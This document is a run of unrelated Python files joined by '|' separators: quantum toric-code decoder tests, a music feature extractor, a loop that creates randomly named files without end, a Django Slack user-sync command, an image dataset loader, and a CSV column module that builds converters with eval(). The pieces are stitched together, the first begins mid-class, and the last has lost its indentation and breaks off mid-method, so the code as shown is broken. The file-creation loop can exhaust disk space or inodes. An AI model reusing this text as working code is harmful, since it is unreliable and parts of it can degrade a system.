    def test_decode_trivial_syndrome(self, decoder, code):
        # An all-zero syndrome must decode to a commuting (trivial)
        # correction of length 2n in binary symplectic form.
        syndrome = np.zeros(
            shape=code.stabilizer_matrix.shape[0], dtype=np.uint
        )
        correction = decoder.decode(syndrome)
        assert correction.shape[0] == 2*code.n
        assert np.all(bcommute(code.stabilizer_matrix, correction) == 0)
        assert issubclass(correction.dtype.type, np.integer)

    def test_decode_X_error(self, decoder, code):
        # Single-qubit X error: weight 1 in the binary symplectic form.
        error = code.to_bsf({
            (2, 1, 2): 'X',
        })
        assert bsf_wt(error) == 1
        # Measure the syndrome and ensure non-triviality.
        syndrome = code.measure_syndrome(error)
        assert np.any(syndrome != 0)
        # The residual error must commute with all stabilizers.
        correction = decoder.decode(syndrome)
        total_error = (error + correction) % 2
        assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)

    def test_decode_many_X_errors(self, decoder, code):
        error = code.to_bsf({
            (1, 0, 0): 'X',
            (0, 1, 0): 'X',
            (0, 0, 3): 'X',
        })
        assert bsf_wt(error) == 3
        syndrome = code.measure_syndrome(error)
        assert np.any(syndrome != 0)
        correction = decoder.decode(syndrome)
        total_error = (error + correction) % 2
        assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)

    def test_unable_to_decode_Z_error(self, decoder, code):
        # A Z error produces a syndrome this decoder does not act on:
        # the correction is trivial and the error remains uncorrected.
        error = code.to_bsf({
            (1, 0, 2): 'Z'
        })
        assert bsf_wt(error) == 1
        syndrome = code.measure_syndrome(error)
        assert np.any(syndrome != 0)
        correction = decoder.decode(syndrome)
        assert np.all(correction == 0)
        total_error = (error + correction) % 2
        assert np.all(error == total_error)
        assert np.any(bcommute(code.stabilizer_matrix, total_error) != 0)

    def test_decode_many_codes_and_errors_with_same_decoder(self):
        # A fresh decoder per (code, site) pair must stay consistent
        # across different lattice sizes.
        codes = [
            Toric3DCode(3, 4, 5),
            Toric3DCode(3, 3, 3),
            Toric3DCode(5, 4, 3),
        ]
        sites = [
            (0, 0, 1),
            (1, 0, 0),
            (0, 1, 0)
        ]
        error_model = PauliErrorModel(1/3, 1/3, 1/3)
        error_rate = 0.1
        for code, site in itertools.product(codes, sites):
            decoder = Toric3DMatchingDecoder(code, error_model, error_rate)
            error = code.to_bsf({
                site: 'X',
            })
            syndrome = code.measure_syndrome(error)
            correction = decoder.decode(syndrome)
            total_error = (error + correction) % 2
            assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)
|
import os
import traceback
import namedtupled
from functools import partial
from itertools import chain
import numpy as np
from scipy import stats
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
import librosa
import h5py
from model.preproc.model import MelSpectrogramGPU
from model.model import Model
from utils.misc import get_layer, load_config
import fire
import tqdm
# Registry of supported datasets: maps a task name to the path of its
# tab-separated info file and the kind of learning target it carries
# ('classification', 'regression' or 'recommendation').  Entries that are
# commented out are datasets not currently enabled.
DATASET_INFO = {
    'GTZAN': {
        'info': '/mnt/bulk2/datasets/GTZAN/GTZAN.dataset.info',
        'type': 'classification'
    },
    'Ballroom': {
        'info': '/mnt/bulk2/datasets/Ballroom/Ballroom.dataset.info',
        'type': 'classification'
    },
    # 'BallroomExt': {
    #     'info': '/mnt/bulk2/datasets/BallroomExt/BallroomExt.dataset.info',
    #     'type': 'classification'
    # },
    # 'FMA': {
    #     'info': '/mnt/bulk2/datasets/FMA/FMA_MEDIUM.dataset.info',
    #     'type': 'classification'
    # },
    'FMA_SUB': {
        'info': '/mnt/bulk2/datasets/FMA/FMA_MEDIUM_SUB.dataset.info',
        'type': 'classification'
    },
    'EmoValStatic': {
        'info': '/mnt/bulk2/datasets/MusicEmotion/MusicEmotionStaticValence.dataset.info',
        'type': 'regression'
    },
    'EmoAroStatic': {
        'info': '/mnt/bulk2/datasets/MusicEmotion/MusicEmotionStaticArousal.dataset.info',
        'type': 'regression'
    },
    'IRMAS_SUB': {
        'info': '/mnt/bulk2/datasets/IRMAS/IRMAS_SUB.dataset.info',
        'type': 'classification'
    },
    'ThisIsMyJam': {
        'info': '/mnt/bulk2/datasets/JamDataset/ThisIsMyJam.dataset.info',
        'type': 'recommendation'
    }
}
class BaseExtractor(object):
    """Base class for dataset feature extractors.

    Resolves the dataset registry entry, validates the output directory,
    parses the tab-separated dataset info file into
    ``(index, filename, labels)`` records, and provides shared label
    encoding and HDF5 bookkeeping.  Subclasses implement
    ``_prepare_db``, ``_extract_feature`` and ``_save_X``.
    """
    def __init__(self, task, out_dir=None, hop_sz=1.,
                 prob=False, *args, **kwargs):
        """
        task    : key into DATASET_INFO identifying the dataset
        out_dir : existing directory for output files (default: cwd)
        hop_sz  : hop size in seconds between analysis windows
        prob    : also store mean class-probability outputs

        Raises ValueError for an unknown task or missing out_dir.
        """
        if task not in DATASET_INFO:
            raise ValueError(
                '[ERROR] {} is not supported!'.format(task))
        self.task = task
        self.task_type = DATASET_INFO[self.task]['type']
        self.hop_sz = hop_sz  # in second
        self.prob = prob  # probability output
        if out_dir is None:
            self.root = os.getcwd()
        else:
            if os.path.exists(out_dir):
                self.root = out_dir
            else:
                # BUGFIX: previously formatted self.root, which is not yet
                # assigned on this path, raising AttributeError instead of
                # the intended ValueError.
                raise ValueError(
                    '[ERROR] {} is not existing!'.format(out_dir))
        # load db information data: one "<ix>\t<filename>\t<labels>" per
        # line; labels is a comma-separated list.  Materialized as a list
        # so it supports len() and repeated iteration (map() is a one-shot
        # iterator on Python 3), and the file handle is closed promptly.
        with open(DATASET_INFO[task]['info'], 'r') as f:
            self.db_info = [
                (r[0], r[1], r[2].split(','))
                for r in (line.replace('\n', '').split('\t')
                          for line in f.readlines())
            ]
        # task-specific symbolic target dimension
        if self.task_type != 'recommendation':
            l = 1
        else:
            # recommendation labels are item-index lists; the target
            # dimension is the largest index + 1
            l = max(list(chain.from_iterable(
                map(lambda r: [int(d) for d in r[2]], self.db_info))))
            l += 1
        self.label_dim = l

    def post_init(self):
        """Finish setup after the subclass has opened self.hf."""
        # setup label dataset
        if self.task_type == 'classification':
            # list() so numpy receives a sequence (map() is lazy on Py3)
            label_set = list(map(lambda x: x[-1], self.db_info))
            self.label_encoder = LabelEncoder()
            self.label_encoder.fit(np.array(label_set).ravel())
            self.hf.create_dataset(
                'labels',
                data=np.array(self.label_encoder.classes_, dtype='S')
            )
        self.hf.attrs['dataset'] = self.task
        self.hf.attrs['type'] = DATASET_INFO[self.task]['type']

    def _prepare_db(self):
        """Create the output HDF5 file and datasets (subclass hook)."""
        raise NotImplementedError

    def _extract_feature(self, fn):
        """Compute the feature vector for one audio file (subclass hook)."""
        raise NotImplementedError

    def _extract_label(self, label):
        """Convert a raw label field into its numeric target value.

        classification -> encoded class index
        regression     -> float value
        recommendation -> multi-hot vector over item indices
        """
        if self.task_type == 'classification':
            return self.label_encoder.transform(np.array(label).ravel())[0]
        elif self.task_type == 'regression':
            return float(label[0])
        elif self.task_type == 'recommendation':
            y = np.zeros((self.label_dim,))
            y[[int(d) for d in label]] = 1
            return y

    def _save_X(self, ix, fn):
        """Store the feature vector for row ix (subclass hook)."""
        raise NotImplementedError

    def _save_y(self, ix, label):
        """Store the numeric target for row ix."""
        self.hf['y'][ix] = self._extract_label(label)

    def process(self):
        """Extract and store features and targets for every db entry."""
        for (ix, fn, label) in tqdm.tqdm(self.db_info, ncols=80):
            ix = int(ix)
            self._save_X(ix, fn)
            self._save_y(ix, label)
class MTLExtractor(BaseExtractor):
    """Feature extractor driven by a trained multi-task-learning model.

    Loads a joblib-saved model state (or falls back to a randomly
    initialized default config), runs audio chunks through the network,
    and stores per-target mean/std feature statistics -- and mean class
    probabilities -- in an HDF5 file.

    NOTE(review): uses the ``xrange`` and ``unicode`` builtins, so this
    class is Python 2 only.
    """
    def __init__(self, model_fn, task, out_dir=None, hop_sz=1.):
        """
        model_fn : path to a '*_state' joblib dump; if it does not exist,
                   a random default configuration is used ('rnd').
        """
        super(MTLExtractor, self).__init__(task, out_dir, hop_sz, prob=True)
        # load configuration for model
        if os.path.exists(model_fn):
            model_id = os.path.splitext(os.path.basename(model_fn))[0]
            self.model_id = model_id.split('_state')[0]
            model_state = joblib.load(model_fn)
            self.config = namedtupled.map(model_state['config'])
        else:
            self.model_id = 'rnd'
            # load default config and change task as rand
            self.config = load_config('config/config.example.json')
            self.config.target[0] = 'rand'
        self.out_fn = os.path.join(
            self.root, self.model_id + '_{}_feature.h5'.format(self.task))
        self.targets = self.config.target
        # load model
        self.model = Model(self.config)
        # variable set up (all taken from the training-time hyperparameters)
        self.sr = self.config.hyper_parameters.sample_rate
        self.length = self.config.hyper_parameters.patch_length
        self.n_fft = self.config.hyper_parameters.n_fft
        self.hop_sz_trn = self.config.hyper_parameters.hop_size
        self.input = self.config.hyper_parameters.input
        self.hop = int(self.hop_sz * self.sr)  # extraction hop in samples
        # analysis window length, trimmed to a multiple of the training hop
        sig_len = int(self.sr * self.length)
        self.sig_len = sig_len - sig_len % self.hop_sz_trn
        # prepare preprocessor if needed
        if self.config.hyper_parameters.input == 'melspec':
            self.melspec = MelSpectrogramGPU(
                2, self.sr, self.n_fft, self.hop_sz_trn)
        # set feature layer names: one per target when branching mid-net,
        # or a single shared 'fc' layer when branching at the fc layer
        branch_at = self.config.hyper_parameters.branch_at
        if isinstance(branch_at, (int, float)):
            self.feature_layers = [
                '{}.fc'.format(t)
                for t in self.targets
            ]
        elif isinstance(branch_at, (str, unicode)) and branch_at == "fc":
            self.feature_layers = ['fc']
        self._prepare_db()
        super(MTLExtractor, self).post_init()
        self.hf.attrs['targets'] = [t.encode() for t in self.targets]

    def _prepare_db(self):
        """ prepare task specific db setting """
        n = len(self.db_info)  # num obs
        # currently, we use same dim for all multi targets
        m = get_layer(
            self.model.net,
            self.feature_layers[0]).output_shape[-1]  # feature dim
        o = self.config.hyper_parameters.n_out  # model output dim
        self.hf = h5py.File(self.out_fn, 'w')
        self.hf.create_dataset('y', shape=(n, self.label_dim))
        self.hf.create_group('X')
        # 'FC' branch case, only one dataset needed
        if self.feature_layers[0] == 'fc':
            self.hf['X'].create_dataset('fc', shape=(n, m * 2))
        # otherwise, dataset needed per each task
        else:
            for target, n_out in zip(self.targets, o):
                # mean / std
                self.hf['X'].create_dataset(target, shape=(n, m * 2))
        if self.prob:
            self.hf.create_group('Z')
            for target, n_out in zip(self.targets, o):
                if target == 'self':
                    continue
                self.hf['Z'].create_dataset(target, shape=(n, n_out))

    def _extract_feature(self, fn):
        """Run one file through the model in hops and aggregate.

        Returns (feature, mean_prob): per-target concatenated mean/std of
        the feature-layer activations, and per-target mean predicted
        probabilities across chunks.
        """
        # load audio
        y, _ = librosa.load(fn, sr=self.sr, res_type='kaiser_fast')
        if y.ndim < 2:
            # mono input: duplicate the channel to fake stereo
            y = np.repeat(y[None, :], 2, axis=0)
        end = y.shape[1]
        X = []
        feature = {target: None for target in self.targets}
        mean_prob = {target: [] for target in self.targets}
        # slice the signal into overlapping chunks; drop the short tail
        for j in xrange(0, end, self.hop):
            slc = slice(j, j + self.sig_len)
            x_chunk = y[:, slc][None, :, :]
            if x_chunk.shape[2] < self.sig_len:
                continue
            if self.config.hyper_parameters.input == 'melspec':
                x_chunk = self.melspec.process(x_chunk)
            X.append(x_chunk)
        x = np.concatenate(X, axis=0)
        # 'FC' branching case, all feature are same
        if self.feature_layers[0] == 'fc':
            Y = self.model.feature(self.targets[0], x)
            feature['fc'] = np.concatenate(
                [np.mean(Y, axis=0).ravel(),
                 np.std(Y, axis=0).ravel()]).ravel()
        # other branching cases, need to extract each feature
        else:
            for target in self.targets:
                Y = self.model.feature(target, x)
                feature[target] = np.concatenate(
                    [np.mean(Y, axis=0).ravel(),
                     np.std(Y, axis=0).ravel()]).ravel()
        for target in self.targets:
            if target == 'self':
                continue
            mean_prob[target].append(
                self.model.predict(target, x).mean(axis=0).ravel())
        return feature, mean_prob

    def _save_X(self, ix, fn):
        """Write features (and probabilities) for row ix.

        NOTE(review): _extract_feature is re-run once per target inside
        the loop -- likely redundant work; confirm before changing.
        """
        for target in self.targets:
            try:
                feat, mean_prob = self._extract_feature(fn)
                if self.feature_layers[0] == 'fc':
                    self.hf['X']['fc'][ix] = feat['fc']
                else:
                    self.hf['X'][target][ix] = feat[target]
                if target == 'self':
                    continue
                if self.prob:
                    self.hf['Z'][target][ix] = mean_prob[target]
            except Exception:
                # keep going on bad files, but mark the row as NaN
                traceback.print_exc()
                self.hf['X'][target][ix, :] = np.nan
                print('[ERROR] file {} has problem!'.format(fn))
class MFCCExtractor(BaseExtractor):
    """Baseline extractor: per-track summary statistics of MFCCs.

    For each file, stores the per-coefficient mean, std, skewness,
    kurtosis, median, min and max of the MFCC matrix (seven statistics
    per coefficient) in a single HDF5 dataset.
    """
    def __init__(self, task, out_dir=None, hop_sz=1., n_mfcc=20):
        """n_mfcc: number of MFC coefficients computed per frame."""
        super(MFCCExtractor, self).__init__(task, out_dir, hop_sz)
        self.out_fn = os.path.join(
            self.root, 'mfcc_{}_feature.h5'.format(self.task))
        self.n_mfcc = n_mfcc
        self.prob = False
        self._prepare_db()
        super(MFCCExtractor, self).post_init()
        self.hf.attrs['targets'] = ['mfcc']

    def _prepare_db(self):
        """Create the HDF5 layout: one row per track, 7*n_mfcc columns."""
        n_rows = len(self.db_info)
        # seven statistics (avg, std, skew, kurt, median, min, max)
        feat_dim = self.n_mfcc * 7
        self.hf = h5py.File(self.out_fn, 'w')
        self.hf.create_dataset('y', shape=(n_rows, self.label_dim))
        self.hf.create_group('X')
        self.hf['X'].create_dataset('mfcc', shape=(n_rows, feat_dim))

    def _extract_feature(self, fn):
        """Load one audio file and return its MFCC summary vector."""
        y, sr = librosa.load(fn, sr=22050, mono=True)
        mfcc_mat = librosa.feature.mfcc(y, sr, n_mfcc=self.n_mfcc)
        summaries = (
            np.mean, np.std, stats.skew, stats.kurtosis,
            np.median, np.min, np.max,
        )
        return np.concatenate([f(mfcc_mat, axis=1) for f in summaries])

    def _save_X(self, ix, fn):
        """Write the feature vector for row ix."""
        self.hf['X']['mfcc'][ix] = self._extract_feature(fn)
def main(task, feature, out_dir, hop_sz=1.):
    """Run feature extraction for one task, or for every registered task.

    task    : a DATASET_INFO key, or 'all' for every dataset
    feature : {MTL_model_fn or 'mfcc'}
    out_dir : directory where the HDF5 feature files are written
    hop_sz  : analysis hop size in seconds
    """
    if feature == 'mfcc':
        Extractor = MFCCExtractor
    else:
        Extractor = partial(MTLExtractor, model_fn=feature)
    if task.lower() == 'all':  # do it all
        # .items()/keys iteration works on both Python 2 and 3; the old
        # code used dict.iteritems(), which does not exist on Python 3.
        # The info value was unused, so iterate keys directly.
        for task_ in DATASET_INFO:
            ext = Extractor(
                task=task_,
                hop_sz=hop_sz,
                out_dir=out_dir
            )
            ext.process()
    else:  # individual tasks
        ext = Extractor(
            task=task,
            hop_sz=hop_sz,
            out_dir=out_dir
        )
        ext.process()
if __name__ == "__main__":
    # Expose main() as a command-line interface via python-fire.
    fire.Fire(main)
|
import subprocess
import os
import time
import random
import string
def randomString(stringLength=10):
    """Return a random string of lowercase ASCII letters of the given length."""
    alphabet = string.ascii_lowercase
    chars = [random.choice(alphabet) for _ in range(stringLength)]
    return ''.join(chars)
files = []
command = "/bin/touch"
processes = set()
max_processes = 100

i = 1
# Effectively an infinite loop: keep generating random names and touching
# the corresponding files, throttled to max_processes children at a time.
while i < 9999999999999999999999999999999999:
    rand = randomString(5)
    print("Adding " + str(i) + "th " + rand)
    files.append(rand)
    i += 1
    # BUGFIX: the original re-launched touch for EVERY name accumulated so
    # far on each pass (a nested `for name in files` loop), spawning O(n^2)
    # duplicate processes.  Launch a single touch for the new name only.
    processes.add(subprocess.Popen([command, rand]))
    # Once the pool is full, wait for a child to exit, then discard all
    # finished processes so the set stays bounded.
    if len(processes) >= max_processes:
        os.wait()
        processes.difference_update(
            [p for p in processes if p.poll() is not None])
import uuid
import requests
from django.contrib.auth.models import User
from django.core.files.base import ContentFile
from django.core.management.base import BaseCommand
from tqdm import tqdm
from slacker import Slacker
from staff.conf import settings
from staff.models import Profile
class Command(BaseCommand):
    help = "Sync users from Slack"

    def handle(self, *args, **options):
        """Mirror Slack workspace members into User/Profile rows.

        Only members with an @politico.com e-mail are synced.  Names are
        derived from the Slack real name, falling back to the display
        name.  Profile photos are downloaded once and never overwritten.
        """
        SLACK = Slacker(settings.SLACK_API_TOKEN)
        slack_users = SLACK.users.list().body["members"]
        for slack_user in tqdm(slack_users, desc="Users"):
            # renamed from `id` to avoid shadowing the builtin
            slack_id = slack_user["id"]
            slack_profile = slack_user["profile"]
            # BUGFIX: Slack may return None for these profile fields; the
            # old code then called None.split(), raising AttributeError,
            # which the `except ValueError` below did not catch.  Coerce
            # to "" so a missing name falls through the same ValueError
            # path as an un-splittable one.
            real_name = slack_profile.get("real_name") or ""
            display_name = slack_profile.get("display_name") or ""
            try:
                first_name, last_name = real_name.split(" ", 1)
            except ValueError:
                try:
                    first_name, last_name = display_name.split(" ", 1)
                except ValueError:
                    first_name = real_name or display_name or ""
                    last_name = ""
            email = slack_profile.get("email", None)
            # Skip members without a politico.com address.
            if not email or not email.endswith("@politico.com"):
                continue
            user, created = User.objects.update_or_create(
                username=email,
                defaults={
                    "email": email,
                    "first_name": first_name,
                    "last_name": last_name,
                    "is_staff": True,
                    "is_active": slack_user["deleted"] is False,
                },
            )
            profile, created = Profile.objects.update_or_create(
                user=user,
                defaults={
                    "slack_api_id": slack_id,
                    "politico_title": slack_profile.get("title", "Staff"),
                },
            )
            # Download the avatar only when we don't already have one.
            if (
                slack_profile.get("image_192", False)
                and not profile.slack_image
            ):
                r = requests.get(slack_profile.get("image_192"), stream=True)
                img = r.raw.read()
                profile.slack_image.save(
                    "slack-profile-{}.jpg".format(uuid.uuid4().hex[:10]),
                    ContentFile(img),
                    save=True,
                )
            profile.save()
|
from torch.utils.data import Dataset
import pandas as pd
from skimage.io import imread
from skimage.transform import resize
from config.data_utils import all_classes
import pickle
def load_pickle(path):
    """Deserialize and return the object stored in the pickle file at *path*."""
    with open(path, 'rb') as fp:
        obj = pickle.load(fp)
    return obj
class data_loader_classifier(Dataset):
    """Torch Dataset of (image, label) pairs read from a lesion CSV.

    Rows whose 'dx' class is not in load_classes are dropped.  In test
    mode, extra 'norm' images listed in a pickle file are appended.
    """
    def __init__(self, path_to_csv, load_classes,path_to_img,path_to_pickle,test=False):
        df=pd.read_csv(path_to_csv)
        # Keep only the requested classes by dropping every other 'dx'.
        drop_classes=list(set(all_classes)-set(load_classes))
        for cls in drop_classes:
            df = df.drop(df[df.dx == cls].index)
        self.imgs=df['image_id'].tolist()
        self.cls=df['dx'].tolist()
        self.path=path_to_img
        if test:
            # Append extra "normal" images listed in the pickle file.
            norm_patients=load_pickle(path_to_pickle)
            print(len(norm_patients))
            self.imgs+=norm_patients
            self.cls+=['norm']*len(norm_patients)
    def get_image(self,path,img_cls):
        """Read an image, optionally crop, and resize to 224x224x3 (bicubic)."""
        img= imread(path)
        # NOTE(review): compares against the int 7, but self.cls holds
        # 'dx' strings, so as called from __getitem__ this crop branch
        # looks unreachable -- confirm the intended label encoding.
        if img_cls==7:
            img=img[:img.shape[0]//4,:img.shape[1]//4,:]
        rescaled_img=resize(img,(224,224,3),order=3)
        return rescaled_img
    def __getitem__(self, idx):
        """Return (resized image array, class label) for row idx."""
        img_path=self.path+self.imgs[idx]+'.jpg'
        img_cls=self.cls[idx]
        img=self.get_image(img_path,img_cls)
        return img, img_cls
    def __len__(self):
        return len(self.imgs)
|
#!/usr/bin/env python3
# Tools for data that can be represented as tables with row and columns.
"""
Tools for translating delimited text to and from Python typed values.
This module uses the Python csv package as the foundation for more
elaborate operations with CSV text. csv.reader.
The features added by this module are:
Readers and Writers that are aware of the column layout of the text.
Conversion of field (column) values from string to type on input
and from type to string on output.
Operators to modify the column layout of the text.
Control and verification of column headings in the first line of
text.
A 'Delim' class to support other forms of delimited text such as
tab-separated fields
The Column class supports input and output of the rows of a table that
is defined in text as rows and columns. Each row is delimited as fields
that correspond to columns of the table. The field values are strings
of text but can be of other types, such as int, when stored internally
by the application. Conversions between string values and typed internal
values is automatic.
Each column has a description consisting of four items:
Heading A string (which may be empty) for the heading
                        at the top of the column.
Input Function A lambda function that converts a string value
                        to the value type stored by the application.
Output Function A lambda function that converts a value from the
                        type stored by the application to the string
representation required in the text
Column name A unique name, required for each column, that
meets the requirements for Python identifiers
and does not start or end with an underscore.
Except for the optional column headings, none of the column information
appears in the text. Instead, all of the information is held by the
application.
Input and output can be with or without column headings. Headings can
be verified on input, but are not verified on output. The options for
managing headings are identified from the enumeration Column.Policy:
Column.Policy.NO_HEADING: No headings
Column.HEADING_NO_CHECK: Headings, but no check
Column.HEADING_EASY_CHECK: Headings, check when input
Any sequence of whitespace is
equivalent to a single space.
Leading and trailing ignored.
Column.HEADING_EXACT_CHECK: Headings, check when input
Every character must match
The input readers are:
Column.ListInput Read each row as list of typed values
Column.DictInput Read each row as dictionary of typed values
Column.NamedInput Read each row as named tuple of typed values
The readers can be configured to accept short rows (missing fields
at the end) and will set the corresponding input values to None.
The output writers are:
Column.ListOutput Output list of typed values as a row
Column.DictOutput Output dictionary of typed values as a row
Column.NamedOutput Output named tuple of typed values as a row
The output writers require rows with a value for every column (no
short rows). Values can be set to None for any column with an
output function that accepts None.
The column operators, which create new instances, are:
append(columns) Append columns to the right
changeheadings(name_heading_pairs)
Change the headings of specified columns
rename(name_pairs) Change the names of specified columns
remove(names) Remove specified columns
select(names) Choose a subset of columns and specify order
Security
This module uses run-time compilation with eval() to support flexible
input, output, and type conversion. Consequently, this module should
only be used with code and data from trusted sources.
"""
# Python 3
import sys
import ast # support for using ast.literal_eval() in lambda functions
import collections
import csv
from enum import Enum
import keyword
import re
import types
class Column(object):
"""
Define format and type conversions for the input of formatted and
delimited text as a table of rows and columns of values, and for
    output of a table as text formatted into rows and columns of values.
A 'Column' object can be initialized with a list or tuple of column
descriptions. Each column desciption is a list or tuple of four
items:
[ heading (any text, or an empty string),
input function (lambda x: convert text to internal type),
output function (lambda x: convert internal type to text),
column name (nonblank)
]
The column name must be unique to each column, must start with a
letter, not end with an underscore, and contain only letters,
digits and underscores.
See the __init__ docstring for more info.
The 'Column' object has methods for selecting a subset of columns,
for obtaining column names and instance data as either lists, or
strings of delimited fields, for saving data to delimited files and
for loading data from delimited files.
A Column object, after initialization, is immutable. Changes to a
Column object will produce a new Column object.
"""
# Class data: regular expressions for column name generator
# One lowercase ASCII letter, followed by lowercase letters, digits,
# underscores, but with no underscore at either end.
_re_nowordchar = re.compile(r"[^a-zA-Z0-9_]+")
_re_space = re.compile(r"\s+")
_re_multiunder = re.compile(r"_{2,}")
_re_noleading = re.compile(r"^[_\d]+")
_re_notrailing = re.compile(r"_+$")
@classmethod
def createcolumnname(cls, text):
'''
Strip disallowed characters to produce a column name.
Creates a valid Python identifier that does not begin or end
with an underscore. text must contain at least one character
that becomes an ASCII letter when converted to lowercase.
'''
# Names will be used as item names in collections.namedtuple,
# so must not begin with underscores.
ident = cls._re_noleading.sub("",
cls._re_notrailing.sub("",
cls._re_multiunder.sub("_",
cls._re_nowordchar.sub("",
cls._re_space.sub("_",
text.lower())))))
if not cls.isvalidcolumnname(ident):
raise ValueError("Cannot convert to valid column name: "
+ repr(text))
if keyword.iskeyword(ident):
ident = ident + "_v"
return ident
# Class data: regular expressions for column name
# One ASCII letter, followed by letters, digits, underscores, but
# with no underscore at either end. Uppercase is OK.
_re_identifier = re.compile(r"[a-zA-Z_][a-zA-Z0-9_]*")
@classmethod
def isvalidcolumnname(cls, text):
"""
Indicate whether text is a valid column name.
A string is a valid column name if it begins with an ASCII
letter, continues with ASCII letters (lowercase or uppercase),
ASCII digits, and underscores, and it does not end with an
underscore.
"""
if text.startswith("_") or text.endswith("_"):
return False
return False if cls._re_identifier.fullmatch(text) is None else True
@classmethod
def eval_lambda_function(cls, func_str):
'''
Evaluate and validate a lambda expression.
\
func_str is a string that should evaluate as a lambda funcition.
'''
if not func_str.lstrip().startswith('lambda'):
raise ValueError(''.join(["Not a lambda expression: ",
repr(func_str)]))
try:
func = eval(func_str) # compile lambda function
if not isinstance(func, types.LambdaType):
raise TypeError("Not a function: " + repr(func_str))
except (SyntaxError, TypeError) as e:
# Failure to parse correctly will be caused by bad input.
raise ValueError(''.join(["Not valid source code for a Python",
" lambda function: ", repr(func_str)])
) from e
return func
# __class__._Policy - how headings should be managed. Easy check strips
# leading and trailing whiterspace, converts other sequences of whitespace
# to a single space character before comparing headings.
Policy = Enum("Policy", " ".join(["NO_HEADING",
"HEADING_NO_CHECK",
"HEADING_EASY_CHECK",
"HEADING_EXACT_CHECK"]))
def __init__(self, columns, headingpolicy=None):
"""
Create a Column instance from another object.
heading policy is one of:
None default (see beloe)
Column.Policy.NO_HEADING
Column.Policy.HEADING_NO_CHECK
Column.Policy.HEADING_EASY_CHECK
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more information
Parameter 'columns' is:
another instance of the class
default headingpolicy is column.Policy
or
an iterable (list, tuple, ) of quadruples of column heading,
input function (lambda), output function (lambda)
and column name (for use as a variable name)
default headingpolicy is Column.HEADING_EXACT_CHECK
The order of the columns will be the same as the order in the
other column instance or the order of the quadruples produced by
the iterable.
The input and output functions do any necessary type conversion
between the external string value and the internally stored
data.
Example of column properties for 4 columns to hold strings,
nullable strings, integers and lists:
[
# Heading
# Input Function
# Output Function
# Column name
[ "String",
"lambda x: str(x)",
"lambda x: '' if x is None else str(x)",
"string_v"],
[ "Nullable String",
"lambda x: None if x == '' else str(x)"",
"lambda x: '' if x is None else str(x)",
"nullable_string"],
[ "Integer",
"lambda x: None if x == '' else int(x)",
"lambda x: '' if x is None else str(x)",
"integer_v"],
[ "List",
"lambda x: None if x == '' else eval(x)",
"lambda x: '' if x is None else repr(x)",
"list_v"]
]
Column properties would be defined to suit the application. For
example, None and '' might be used to represent the absence of a
numeric value internally (None) and externally (empty string).
"""
super().__init__()
if headingpolicy and not isinstance(headingpolicy, __class__.Policy):
raise ValueError("Invalid heading policy: " + repr(headingpolicy))
# Create a subclass of NamedTuple for properties of each column
# when invoked as a function, behaves like a class object
self._ColProperty = collections.namedtuple("_ColProperty",
["infunc", "outfunc", "heading"])
# initialize from another instance or from an iterable of iterables
if isinstance(columns,type(self)):
# from another instance - make deep copy to avoid shared data
self._column = collections.OrderedDict(columns._column.items())
if headingpolicy:
self._headingpolicy = headingpolicy
else:
self._headingpolicy = columns._headingpolicy
else:
try:
self._column = self._columndictionary(columns)
except Exception as e:
raise RuntimeError(
"While initializing column definition") from e
if headingpolicy:
self._headingpolicy = headingpolicy
else:
self._headingpolicy = self.Policy.HEADING_EXACT_CHECK
# attributes with cached values
# Some of the operators create an instance with no column definitions
# and then add definitions. Attributes that depend on the column
# definitions must exist on first reference but cannot be set to final
# values until all of the column definitions exist.
self._NamedRow = None # returned by self.NamedRow()
def _columndictionary(self, initdata):
"""
Create column dictionary from an iterable of iterables of str.
The iterables must not themselves be type str.
As of 2019-05-10, the inner iterable produces four items:
Heading as text
input function as text for a lambda function
output function as text for a lambda function
column name as text
The corresponding dictionary entry is
columnname:[inputfunction, outputfunction, heading]
"""
if isinstance(initdata, str):
raise ValueError("Intializer is type str")
column_dictionary = collections.OrderedDict()
for init in initdata: # for each column
if isinstance(init, str):
raise ValueError("Column description is type str")
item = [j for j in init] # convert iterator or generator to list
# index errors would really be data errors
if len(item) < 4:
raise ValueError("Less than 4 items in column description: "
+ repr(item))
# item 0, column heading
column_heading = item[0]
# allow blank headings, treat missing as blank
if column_heading is None:
column_heading = ""
# items 1 and 2, input and output functions
infunc = self.eval_lambda_function(item[1])
outfunc = self.eval_lambda_function(item[2])
# item 3, column names
column_name = item[3]
if column_name in column_dictionary:
raise ValueError("Duplicate column name: " + column_name)
if not __class__.isvalidcolumnname(column_name):
raise ValueError("Invalid column name: " + column_name)
column_dictionary.setdefault(column_name,
self._ColProperty(infunc=infunc,
outfunc=outfunc,
heading=column_heading))
return column_dictionary
def __str__(self):
"""
Names of columns.
"""
return (__class__.__name__ + ".names=" + repr(self.names()))
    def __len__(self):
        """
        Return the number of columns.
        """
        return len(self._column)
    def _infunc(self, name):
        # Input conversion function (text -> internal) for the named column.
        return self._column[name].infunc
    def _outfunc(self, name):
        # Output conversion function (internal -> text) for the named column.
        return self._column[name].outfunc
    def _inputlocation(self, line_num):
        """
        Report input location as line offset from beginning.
        """
        return ''.join(["Input line ", str(line_num), ":"])
    def _outputlocation(self, line_num):
        """
        Report output location as line offset from beginning.
        """
        return ''.join(["Output line ", str(line_num), ":"])
@property
def names(self):
"""
Column names as a list of strings.
"""
return [name for name in self._column.keys()]
    def heading(self, name):
        """
        Return the heading of the named column.

        Heading may be an empty string. Two or more columns could have
        the same heading. Raises KeyError for an unknown column name.
        """
        return self._column[name].heading
    @property
    def headingpolicy(self):
        """
        The heading policy in force, one of the enumeration
        Column.Policy:
            Policy.NO_HEADING          No headings
            Policy.HEADING_NO_CHECK    Required headings, not verified
            Policy.HEADING_EASY_CHECK  Headings verified, any sequence
                                       of whitespace is equivalent
                                       to ' '
            Policy.HEADING_EXACT_CHECK Headings verified, exact match
        """
        return self._headingpolicy
@property
def NamedRow(self): # returns a class object for creating instances
"""
NamedRow class object - creates named tuple of column values.
NamedRow is a subclass of collections.namedtuple. The item names
are the same as the column names, and are in the same order.
Usage:
NamedRow()
NamedRow(row)
NamedRow(name=value, ... )
If name=value pairs are given, all the column names must be
included.
If row is given, it must be an iterable producing the same
number of values as there are columns in the table.
If row is not given, the tuple will have the same number of
items as there are columns in the table. Each item will be set
to None.
"""
# create namedtuple subclass factory on first invocation, see __init__
if not self._NamedRow:
